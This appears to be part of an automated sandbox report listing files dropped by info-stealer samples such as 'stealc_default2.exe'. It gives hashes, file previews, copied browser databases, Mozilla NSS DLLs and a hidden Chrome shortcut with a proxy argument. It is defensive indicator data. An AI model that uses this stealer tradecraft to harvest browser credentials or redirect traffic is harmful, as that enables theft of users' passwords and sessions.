File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHDAFIID

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDGIJECGDGCBKECAKFBGCAKECG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHDBKFHIJKJKECAAAECA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHDBKFHIJKJKECAAAECAECFBFI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHJDBAKEHDHDGCAKKJJE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9526
Entropy (8bit):	5.515924904533179
Encrypted:	false
SSDEEP:	192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
MD5:	4580799F1DC5720A7EC1766400E98740
SHA1:	92FD30F47EC545245B934EA492B3C64D5E609AA9
SHA-256:	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
SHA-512:	C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HIJJDGDH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIEHJEHDBGHIDGDGHCBGDGCBFI

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8467337400211222
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
MD5:	7A03CC0EAD0AEFF210C3E60823AAA5EC
SHA1:	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
SHA-256:	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
SHA-512:	8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFCFHJDBKKFHIEHIDGCFCAEB

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKKEBGCGHIDHCBFHIDGHCBKEHC

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECFIDGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 08:16:11 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4584308623429756
Encrypted:	false
SSDEEP:	48:8SodYT5H0lRYrnvPdAKRkdAGdAKRFdAKRz:8Snx7
MD5:	DB784B1BE5FE3D5FE264B7C3617AC11E
SHA1:	E822A9F5105E51C7265C75EAFDAAB32DCCD1EC8A
SHA-256:	1915B37F38957621AE47463D0AA85B8B0B8BDCC2BA321AE17DDAE26F85F7B289
SHA-512:	591D9B30B0B9A2ABA26B252B5EE1804993F17C24424775F442C4914B916F3A73D80F4404CF9CCF31B99FF9897AC238FFD1CFFDEA98A41512618947A20DE0417D
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......,......,.l....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.IEW.I....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.VEW.F....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.VEW.F.............................A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.I..........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\12dsvc.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000285001\2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypted.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	137
Entropy (8bit):	5.202653706100432
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WyMLDRJ4LNRLFS9Am12MFuAvOAsyQHxW+uCv:Q3La/xwchM3RJoDLIP12MUAvvR+uCv
MD5:	8A8F1E8A778DFF107B41EA564681FE7B
SHA1:	08EFCFDC3E33281B2B107D16B739B72AF4898041
SHA-256:	D09CDD05DA4E3E875D3D5D66C542404519759ACDA2EFA7C00CA69AA3F6234DE4
SHA-512:	A372330793E09C661E6BF8B2C293C1AF81DE77972B8B4BA47055F07BE0FCDFE5E507ADBC53903A0CD90C392B36FE4A8A41D3FEA923AD97FA061DBEF65398EDF6
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gold.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
